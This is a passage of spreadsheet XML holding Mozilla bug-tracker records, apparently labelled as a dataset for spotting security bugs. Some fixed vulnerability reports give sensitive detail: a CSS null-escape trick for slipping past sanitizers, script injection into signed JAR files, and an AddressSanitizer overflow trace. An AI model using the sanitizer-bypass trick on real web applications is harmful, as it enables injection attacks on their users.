          <t>Per bug 1413258, Lets Encrypts adoption stats are using the current public Telemetry aggregates for release, querying HTTP_PAGELOAD_IS_SSL.
That data is going away per the data preference changes of bug 1406390 et al, see [1].
We should provide an alternative public dataset covering that use-case from release data.
1: https://medium.com/@georg.fritzsche/data-preference-changes-in-firefox-58-2d5df9c428b5</t>
        </is>
      </c>
      <c r="X1043" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1044">
      <c r="A1044" t="n">
        <v>1360334</v>
      </c>
      <c r="B1044" t="inlineStr">
        <is>
          <t>2017-04-27 12:36:00 -0700</t>
        </is>
      </c>
      <c r="C1044" t="inlineStr">
        <is>
          <t>Crash in mozilla::MediaStreamGraph::NotifyOutputData since Firefox 49</t>
        </is>
      </c>
      <c r="D1044" t="inlineStr">
        <is>
          <t>2018-02-01 17:25:06 -0800</t>
        </is>
      </c>
      <c r="E1044" t="n">
        <v>1</v>
      </c>
      <c r="F1044" t="n">
        <v>1</v>
      </c>
      <c r="G1044" t="n">
        <v>3</v>
      </c>
      <c r="H1044" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1044" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1044" t="inlineStr">
        <is>
          <t>Audio/Video: MediaStreamGraph</t>
        </is>
      </c>
      <c r="K1044" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1044" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1044" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1044" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1044" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1044" t="inlineStr">
        <is>
          <t>[adv-main56+][adv-esr52.4+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1044" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1044" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1044" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T1044" t="n">
        <v>1</v>
      </c>
      <c r="U1044" t="n">
        <v>0</v>
      </c>
      <c r="V1044" t="n">
        <v>43</v>
      </c>
      <c r="W1044" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1302231 +++
+++ This bug was initially created as a clone of Bug #1293976 +++
Frame 	Module 	Signature 	Source
0 	xul.dll 	mozilla::MediaStreamGraph::NotifyOutputData(float*, unsigned int, int, unsigned int) 	dom/media/MediaStreamGraph.cpp:1256
1 	xul.dll 	mozilla::AudioCallbackDriver::DataCallback(float const*, float*, long) 	dom/media/GraphDriver.cpp:911
We're still seeing a low volume of crashes in this function - perhaps the MSG object itself is getting deleted out from under us?</t>
        </is>
      </c>
      <c r="X1044" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1045">
      <c r="A1045" t="n">
        <v>1174139</v>
      </c>
      <c r="B1045" t="inlineStr">
        <is>
          <t>2015-06-12 05:42:31 -0700</t>
        </is>
      </c>
      <c r="C1045" t="inlineStr">
        <is>
          <t>Stage MozillaBuild 2.0</t>
        </is>
      </c>
      <c r="D1045" t="inlineStr">
        <is>
          <t>2015-06-12 12:21:46 -0700</t>
        </is>
      </c>
      <c r="E1045" t="n">
        <v>1</v>
      </c>
      <c r="F1045" t="n">
        <v>1</v>
      </c>
      <c r="G1045" t="n">
        <v>5</v>
      </c>
      <c r="H1045" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1045" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1045" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1045" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1045" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1045" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1045" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1045" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1045" t="inlineStr"/>
      <c r="Q1045" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1045" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1045" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1045" t="n">
        <v>1</v>
      </c>
      <c r="U1045" t="n">
        <v>0</v>
      </c>
      <c r="V1045" t="n">
        <v>4</v>
      </c>
      <c r="W1045" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1113949 +++
Mozillabuild 2.0 is ready for release!
File: http://people.mozilla.org/~rvandermeulen/MozillaBuildSetup2.0.0.exe
$ sha1sum MozillaBuildSetup2.0.0.exe
daba4bc03ae9014c68611fd36b05dcc4083c6fdb  MozillaBuildSetup2.0.0.exe
Target:
http://ftp.mozilla.org/pub/mozilla.org/mozilla/libraries/win32/MozillaBuildSetup-2.0.0.exe (also update the MozillaBuildSetup-Latest.exe symlink)
Sources are tagged.</t>
        </is>
      </c>
      <c r="X1045" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1046">
      <c r="A1046" t="n">
        <v>821479</v>
      </c>
      <c r="B1046" t="inlineStr">
        <is>
          <t>2012-12-13 13:50:53 -0800</t>
        </is>
      </c>
      <c r="C1046" t="inlineStr">
        <is>
          <t>Out-of-bounds read crash in PropertyProvider::GetSpacingInternal</t>
        </is>
      </c>
      <c r="D1046" t="inlineStr">
        <is>
          <t>2014-11-19 19:39:24 -0800</t>
        </is>
      </c>
      <c r="E1046" t="n">
        <v>1</v>
      </c>
      <c r="F1046" t="n">
        <v>1</v>
      </c>
      <c r="G1046" t="n">
        <v>3</v>
      </c>
      <c r="H1046" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1046" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1046" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K1046" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1046" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1046" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1046" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1046" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1046" t="inlineStr">
        <is>
          <t>[asan][adv-main21+] testcase in bug 765621</t>
        </is>
      </c>
      <c r="Q1046" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1046" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1046" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T1046" t="n">
        <v>1</v>
      </c>
      <c r="U1046" t="n">
        <v>0</v>
      </c>
      <c r="V1046" t="n">
        <v>14</v>
      </c>
      <c r="W1046" t="inlineStr">
        <is>
          <t>Nightly, 2012-12-12, found using bug files from related bug #765621.
I'm guessing on the title, based on the crash report. Please edit the title for accuracy if I have gotten it wrong.
A similar bug exists in #807891. 
=================================================================
==1661== ERROR: AddressSanitizer heap-buffer-overflow on address 0x0001294ddc63 at pc 0x105ecb04c bp 0x7fff5fbf4990 sp 0x7fff5fbf4988
READ of size 1 at 0x0001294ddc63 thread T0
    #0 0x105ecb04b in PropertyProvider::GetSpacingInternal nsTextFragment.h:162
    #1 0x105ecb9d3 in PropertyProvider::CalcTabWidths nsTextFrameThebes.cpp:3046
    #2 0x105ec9d1b in PropertyProvider::GetSpacingInternal nsTextFrameThebes.cpp:2936
    #3 0x109da4dd6 in GetAdjustedSpacing gfxFont.cpp:4713
    #4 0x109da4bf9 in gfxTextRun::GetAdjustedSpacingArray gfxFont.cpp:4744
    #5 0x109da7126 in gfxTextRun::AccumulateMetricsForRun gfxFont.cpp:5012
    #6 0x109da6db7 in gfxTextRun::MeasureText gfxFont.cpp:5083
    #7 0x105ef8d24 in nsTextFrame::ComputeTightBounds const nsTextFrameThebes.cpp:7289
    #8 0x105d4d488 in nsFrame::ComputeSimpleTightBounds const nsFrame.cpp:4132
    #9 0x105ca45d3 in nsBlockFrame::ComputeTightBounds const nsBlockFrame.cpp:831
    #10 0x106372ee7 in nsMathMLContainerFrame::ReflowChild nsMathMLContainerFrame.cpp:895
    #11 0x106373772 in nsMathMLContainerFrame::Reflow nsMathMLContainerFrame.cpp:926
    #12 0x105e3707a in nsLineLayout::ReflowFrame nsLineLayout.cpp:840
    #13 0x105cc84c8 in nsBlockFrame::ReflowInlineFrame nsBlockFrame.cpp:3723
    #14 0x105cc6262 in nsBlockFrame::DoReflowInlineFrames nsBlockFrame.cpp:3520
    #15 0x105cc15a9 in nsBlockFrame::ReflowInlineFrames nsBlockFrame.cpp:3374
    #16 0x105caf54e in nsBlockFrame::ReflowDirtyLines nsBlockFrame.cpp:1998
    #17 0x105ca58f7 in nsBlockFrame::Reflow nsBlockFrame.cpp:1041
    #18 0x105d0adfc in nsContainerFrame::ReflowChild nsContainerFrame.cpp:952
    #19 0x105de22e1 in nsCanvasFrame::Reflow nsCanvasFrame.cpp:472
    #20 0x105d0adfc in nsContainerFrame::ReflowChild nsContainerFrame.cpp:952
    #21 0x105dad4e9 in nsHTMLScrollFrame::ReflowScrolledFrame nsGfxScrollFrame.cpp:433
    #22 0x105dadd22 in nsHTMLScrollFrame::ReflowContents nsGfxScrollFrame.cpp:533
    #23 0x105db0ec1 in nsHTMLScrollFrame::Reflow nsGfxScrollFrame.cpp:774
    #24 0x105d0adfc in nsContainerFrame::ReflowChild nsContainerFrame.cpp:952
    #25 0x105f2c593 in ViewportFrame::Reflow nsViewportFrame.cpp:202
    #26 0x105ba0e9e in PresShell::DoReflow nsPresShell.cpp:7554
    #27 0x105bb69aa in PresShell::ProcessReflowCommands nsPresShell.cpp:7695
    #28 0x105bb5d14 in PresShell::FlushPendingNotifications nsPresShell.cpp:3907
    #29 0x105bfbd17 in nsRefreshDriver::Tick nsRefreshDriver.cpp:897
    #30 0x105c00931 in mozilla::RefreshDriverTimer::Tick nsRefreshDriver.cpp:164
    #31 0x109c1bdbe in nsTimerImpl::Fire nsTimerImpl.cpp:482
    #32 0x109c1c95e in nsTimerEvent::Run nsTimerImpl.cpp:565
    #33 0x109c09f3e in nsThread::ProcessNextEvent nsThread.cpp:627
    #34 0x109af8918 in NS_ProcessPendingEvents_P nsThreadUtils.cpp:171
    #35 0x109013f1e in nsBaseAppShell::NativeEventCallback nsBaseAppShell.cpp:97
    #36 0x108f57b0c in nsAppShell::ProcessGeckoEvents nsAppShell.mm:387
    #37 0x7fff91b4e100 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (in CoreFoundation) + 16
    #38 0x7fff91b4da24 in __CFRunLoopDoSources0 (in CoreFoundation) + 244
    #39 0x7fff91b70dc4 in __CFRunLoopRun (in CoreFoundation) + 788
    #40 0x7fff91b706b1 in CFRunLoopRunSpecific (in CoreFoundation) + 289
    #41 0x7fff8b5140a3 in RunCurrentEventLoopInMode (in HIToolbox) + 208
    #42 0x7fff8b513e41 in ReceiveNextEventCommon (in HIToolbox) + 355
    #43 0x7fff8b513cd2 in BlockUntilNextEventMatchingListInMode (in HIToolbox) + 61
    #44 0x7fff8d811612 in _DPSNextEvent (in AppKit) + 684
    #45 0x7fff8d810ed1 in -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] (in AppKit) + 127
    #46 0x108f55bd7 in -[GeckoNSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] nsAppShell.mm:164
    #47 0x7fff8d808282 in -[NSApplication run] (in AppKit) + 516
    #48 0x108f588a9 in nsAppShell::Run nsAppShell.mm:741
    #49 0x10887b2b0 in nsAppStartup::Run nsAppStartup.cpp:291
    #50 0x1050c56ae in XREMain::XRE_mainRun nsAppRunner.cpp:3824
    #51 0x1050c6cdc in XREMain::XRE_main nsAppRunner.cpp:3891
    #52 0x1050c76ca in XRE_main nsAppRunner.cpp:4089
    #53 0x10000294f in main nsBrowserApp.cpp:174
    #54 0x100001553 in start (in firefox-bin) + 51
    #55 0x0 in 0x0000000100000000 (in firefox-bin)
0x0001294ddc63 is located 29 bytes to the left of 94-byte region [0x0001294ddc80,0x0001294ddcde)
allocated by thread T0 here:
    #0 0x10000d7cc in (anonymous namespace)::mz_malloc(_malloc_zone_t*, unsigned long) (in firefox-bin) + 44
    #1 0x7fff8c723152 in malloc_zone_malloc (in libsystem_c.dylib) + 70
    #2 0x7fff8c723ba6 in malloc (in libsystem_c.dylib) + 40
    #3 0x10274250d in moz_xmalloc mozalloc.cpp:54
    #4 0x106706bb2 in nsTextFragment::SetTo nsMemory.h:36
    #5 0x1066102ad in nsGenericDOMDataNode::SetTextInternal nsGenericDOMDataNode.cpp:290
    #6 0x106615a44 in nsGenericDOMDataNode::SetText nsGenericDOMDataNode.cpp:833
    #7 0x106542c92 in nsDocument::CreateTextNode nsIContent.h:521
    #8 0x1083541ac in nsIDOMDocument_CreateTextNode dom_quickstubs.cpp:1332
    #9 0x10b2a77fa in js::CallJSNative, JS::CallArgs const&amp;) jscntxtinlines.h:364
    #10 0x10b29810a in js::InvokeKernel jsinterp.cpp:382
    #11 0x10b285525 in js::Interpret jsinterp.cpp:2348
    #12 0x10b873f20 in js::mjit::EnterMethodJIT MethodJIT.cpp:1066
    #13 0x10b874d42 in CheckStackAndEnterMethodJIT MethodJIT.cpp:1097
    #14 0x10b87490b in js::mjit::JaegerShot MethodJIT.cpp:1115
    #15 0x10b26ec09 in js::RunScript jsinterp.cpp:343
    #16 0x10b298024 in js::InvokeKernel jsinterp.cpp:404
    #17 0x10b299a3d in js::Invoke jsinterp.h:112
    #18 0x10b0b099e in JS_CallFunctionValue jsapi.cpp:5789
    #19 0x1082f8197 in nsXPCWrappedJSClass::CallMethod XPCWrappedJSClass.cpp:1432
    #20 0x1082e043f in nsXPCWrappedJS::CallMethod XPCWrappedJS.cpp:580
    #21 0x109c6680f in PrepareAndDispatch xptcstubs_x86_64_darwin.cpp:121
    #22 0x109c6513a in SharedStub (in XUL) + 90
Shadow byte and word:
  0x10002529bb8c: fa
  0x10002529bb88: fa fa fa fa fa fa fa fa
More shadow bytes:
  0x10002529bb68: fa fa fa fa fa fa fa fa
  0x10002529bb70: fd fd fd fd fd fd fd fd
  0x10002529bb78: fd fd fd fd fd fd fd fd
  0x10002529bb80: fa fa fa fa fa fa fa fa
=&gt;0x10002529bb88: fa fa fa fa fa fa fa fa
  0x10002529bb90: 00 00 00 00 00 00 00 00
  0x10002529bb98: 00 00 00 06 fb fb fb fb
  0x10002529bba0: fa fa fa fa fa fa fa fa
  0x10002529bba8: fa fa fa fa fa fa fa fa
Stats: 926M malloced (702M for red zones) by 1093052 calls
Stats: 117M realloced by 48243 calls
Stats: 871M freed by 883111 calls
Stats: 728M really freed by 617834 calls
Stats: 848M (217234 full pages) mmaped in 195 calls
  mmaps   by size class: 8:425958; 9:65528; 10:24570; 11:18423; 12:6144; 13:3584; 14:1792; 15:2048; 16:1280; 17:1312; 18:64; 19:40; 20:24; 21:24; 22:11; 23:8; 24:3;
  mallocs by size class: 8:813948; 9:131520; 10:62859; 11:48412; 12:13338; 13:9046; 14:4430; 15:4650; 16:2349; 17:2137; 18:158; 19:96; 20:43; 21:36; 22:12; 23:10; 24:8;
  frees   by size class: 8:640884; 9:108444; 10:55114; 11:45679; 12:11474; 13:8453; 14:4122; 15:4467; 16:2037; 17:2107; 18:134; 19:91; 20:40; 21:35; 22:12; 23:10; 24:8;
  rfrees  by size class: 8:417410; 9:85525; 10:46759; 11:40530; 12:9482; 13:7117; 14:3698; 15:3880; 16:1242; 17:1911; 18:119; 19:66; 20:37; 21:31; 22:11; 23:10; 24:6;
Stats: malloc large: 2563 small slow: 7378</t>
        </is>
      </c>
      <c r="X1046" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" t="n">
        <v>228856</v>
      </c>
      <c r="B1047" t="inlineStr">
        <is>
          <t>2003-12-18 03:30:03 -0800</t>
        </is>
      </c>
      <c r="C1047" t="inlineStr">
        <is>
          <t>[FIX] \0 in CSS is ignored</t>
        </is>
      </c>
      <c r="D1047" t="inlineStr">
        <is>
          <t>2013-06-02 20:12:32 -0700</t>
        </is>
      </c>
      <c r="E1047" t="n">
        <v>1</v>
      </c>
      <c r="F1047" t="n">
        <v>1</v>
      </c>
      <c r="G1047" t="n">
        <v>3</v>
      </c>
      <c r="H1047" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1047" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1047" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K1047" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1047" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1047" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1047" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1047" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1047" t="inlineStr">
        <is>
          <t>[sg:low] xss hazard</t>
        </is>
      </c>
      <c r="Q1047" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1047" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S1047" t="inlineStr">
        <is>
          <t>mozilla1.9.1b2</t>
        </is>
      </c>
      <c r="T1047" t="n">
        <v>1</v>
      </c>
      <c r="U1047" t="n">
        <v>1</v>
      </c>
      <c r="V1047" t="n">
        <v>64</v>
      </c>
      <c r="W1047" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.6b) Gecko/20031213
Build Identifier: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.6b) Gecko/20031213
In CSS, \0 means a null character. But it is ignored by Mozilla.
(ex. "c\0olor:red;" is treated as "color:red;".)
BTW, a raw null character in CSS is treated correctly as null 
by Mozilla.
(ex. "c*olor:red;" (*=null character(x00)) is not treated as 
"color:red".)
Reproducible: Always
Steps to Reproduce:
Actual Results:  
\0 in CSS is ignored.
Expected Results:  
\0 in CSS is treated as a null character. (equal to a raw null 
character)
This \0 ignoring has possibility to avoid sanitizing of web application (webmail
etc.).
Internet Explorer executes JScript in CSS so \0 can be a vulnerability.
http://altba.com/bakera/bug/nul-test.html
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/12.html#20031216_IE
Though Mozilla does not executes JavaScript in CSS (so far as I know), 
it can use for web bug easily. (ex. @i\0mport )</t>
        </is>
      </c>
      <c r="X1047" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1048">
      <c r="A1048" t="n">
        <v>914352</v>
      </c>
      <c r="B1048" t="inlineStr">
        <is>
          <t>2013-09-09 14:13:41 -0700</t>
        </is>
      </c>
      <c r="C1048" t="inlineStr">
        <is>
          <t>fs.writeFile with an object as `path` hard crashes</t>
        </is>
      </c>
      <c r="D1048" t="inlineStr">
        <is>
          <t>2013-10-04 14:03:48 -0700</t>
        </is>
      </c>
      <c r="E1048" t="n">
        <v>1</v>
      </c>
      <c r="F1048" t="n">
        <v>1</v>
      </c>
      <c r="G1048" t="n">
        <v>6</v>
      </c>
      <c r="H1048" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1048" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J1048" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1048" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1048" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1048" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1048" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1048" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1048" t="inlineStr"/>
      <c r="Q1048" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1048" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1048" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1048" t="n">
        <v>1</v>
      </c>
      <c r="U1048" t="n">
        <v>0</v>
      </c>
      <c r="V1048" t="n">
        <v>5</v>
      </c>
      <c r="W1048" t="inlineStr">
        <is>
          <t>Using an object as a path in fs.writeFile does a hard crash (Mozilla Crash Reporter pops up)
Recreate:
```
let { writeFile } = require('sdk/io/fs');
writeFile({}, 0755, function () {});
```
This should fail more gracefully.</t>
        </is>
      </c>
      <c r="X1048" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1049">
      <c r="A1049" t="n">
        <v>418996</v>
      </c>
      <c r="B1049" t="inlineStr">
        <is>
          <t>2008-02-22 02:04:50 -0800</t>
        </is>
      </c>
      <c r="C1049" t="inlineStr">
        <is>
          <t>[FIX]Unsigned documents can inject script into signed JARs</t>
        </is>
      </c>
      <c r="D1049" t="inlineStr">
        <is>
          <t>2012-08-16 18:06:02 -0700</t>
        </is>
      </c>
      <c r="E1049" t="n">
        <v>1</v>
      </c>
      <c r="F1049" t="n">
        <v>1</v>
      </c>
      <c r="G1049" t="n">
        <v>3</v>
      </c>
      <c r="H1049" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1049" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1049" t="inlineStr">
        <is>
          <t>Security: CAPS</t>
        </is>
      </c>
      <c r="K1049" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1049" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1049" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1049" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1049" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1049" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q1049" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1049" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1049" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1049" t="n">
        <v>1</v>
      </c>
      <c r="U1049" t="n">
        <v>0</v>
      </c>
      <c r="V1049" t="n">
        <v>52</v>
      </c>
      <c r="W1049" t="inlineStr">
        <is>
          <t>A malicious web page can embed an iframe to a document inside a signed JAR file and inject script into that document. The injected script runs with privileges of the JAR file, even though it was not written by the signer of the JAR file.
Because netscape.security.PrivilegeManager.enablePrivilege uses the common name of the principal who signed the JAR file in its security UI, a malicious web page can impersonate anyone who signs a JAR file. The below web page can impersonate Google, Yahoo!, eBay, and LinkedIn:
http://crypto.stanford.edu/~collinj/research/signed-scripts/
It is not hard for an attacker for find such a JAR file, because signed JAR files are commonly used to distribute extensions; addons.mozilla.org contains JAR files signed by various well-known brands.
If a user ever checks "Remember this decision," any web site can now obtain that principal's capabilities without prompting the user, provided that the attacker can obtain a JAR file signed by that principal.</t>
        </is>
      </c>
      <c r="X1049" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1050">
      <c r="A1050" t="n">
        <v>703348</v>
      </c>
      <c r="B1050" t="inlineStr">
        <is>
          <t>2011-11-17 12:13:17 -0800</t>
        </is>
      </c>
      <c r="C1050" t="inlineStr">
        <is>
          <t>Increase CCACHE max cache size</t>
        </is>
      </c>
      <c r="D1050" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1050" t="n">
        <v>1</v>
      </c>
      <c r="F1050" t="n">
        <v>1</v>
      </c>
      <c r="G1050" t="n">
        <v>5</v>
      </c>
      <c r="H1050" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1050" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1050" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1050" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1050" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1050" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1050" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1050" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1050" t="inlineStr">
        <is>
          <t>[mac][linux][buildslaves]</t>
        </is>
      </c>
      <c r="Q1050" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1050" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1050" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1050" t="n">
        <v>1</v>
      </c>
      <c r="U1050" t="n">
        <v>0</v>
      </c>
      <c r="V1050" t="n">
        <v>10</v>
      </c>
      <c r="W1050" t="inlineStr">
        <is>
          <t>Adding Thunderbird builds to the build pool will demand a larger maximum CCACHE cache size so we don't negatively impact cache hits.  Currently set to 5GB max; we may want to double that to 10GB.</t>
        </is>
      </c>
      <c r="X1050" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1051">
      <c r="A1051" t="n">
        <v>397759</v>
      </c>
      <c r="B1051" t="inlineStr">
        <is>
          <t>2007-09-27 06:59:50 -0700</t>
        </is>
      </c>
      <c r="C1051" t="inlineStr">
        <is>
          <t>make TinderboxMailNotifier be able to report many slave builders as individual columns</t>
        </is>
      </c>
      <c r="D1051" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1051" t="n">
        <v>1</v>
      </c>
      <c r="F1051" t="n">
        <v>1</v>
      </c>
      <c r="G1051" t="n">
        <v>5</v>
      </c>
      <c r="H1051" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1051" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1051" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1051" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1051" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1051" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1051" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1051" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1051" t="inlineStr"/>
      <c r="Q1051" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1051" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1051" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1051" t="n">
        <v>1</v>
      </c>
      <c r="U1051" t="n">
        <v>0</v>
      </c>
      <c r="V1051" t="n">
        <v>10</v>
      </c>
      <c r="W1051" t="inlineStr">
        <is>
          <t>This feature request came out of bug#397755. Basically, it's confusing to have many slaves reporting to one Tinderbox tree. There a workaround for it, but it's not something I'd want put into the Buildbot tree. It shouldn't be hard to make it robust. I've attached it here.
My suggestion is to have a format string passed in. %b could be builder name, %s could be slave name, etc. There's probably other useful things.</t>
        </is>
      </c>
      <c r="X1051" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1052">
      <c r="A1052" t="n">
        <v>837714</v>
      </c>
      <c r="B1052" t="inlineStr">
        <is>
          <t>2013-02-04 08:17:49 -0800</t>
        </is>
      </c>
      <c r="C1052" t="inlineStr">
        <is>
          <t>Assertion failure: allocated(), at ../../gc/Heap.h:472 or Opt-Crash [@ js::GCMarker::drainMarkStack]</t>
        </is>
      </c>
      <c r="D1052" t="inlineStr">
        <is>
          <t>2013-11-25 13:26:36 -0800</t>
        </is>
      </c>
      <c r="E1052" t="n">
        <v>1</v>
      </c>
      <c r="F1052" t="n">
        <v>1</v>
      </c>
      <c r="G1052" t="n">
        <v>3</v>
      </c>
      <c r="H1052" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1052" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1052" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1052" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1052" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1052" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1052" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1052" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1052" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][adv-main20+]</t>
        </is>
      </c>
      <c r="Q1052" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
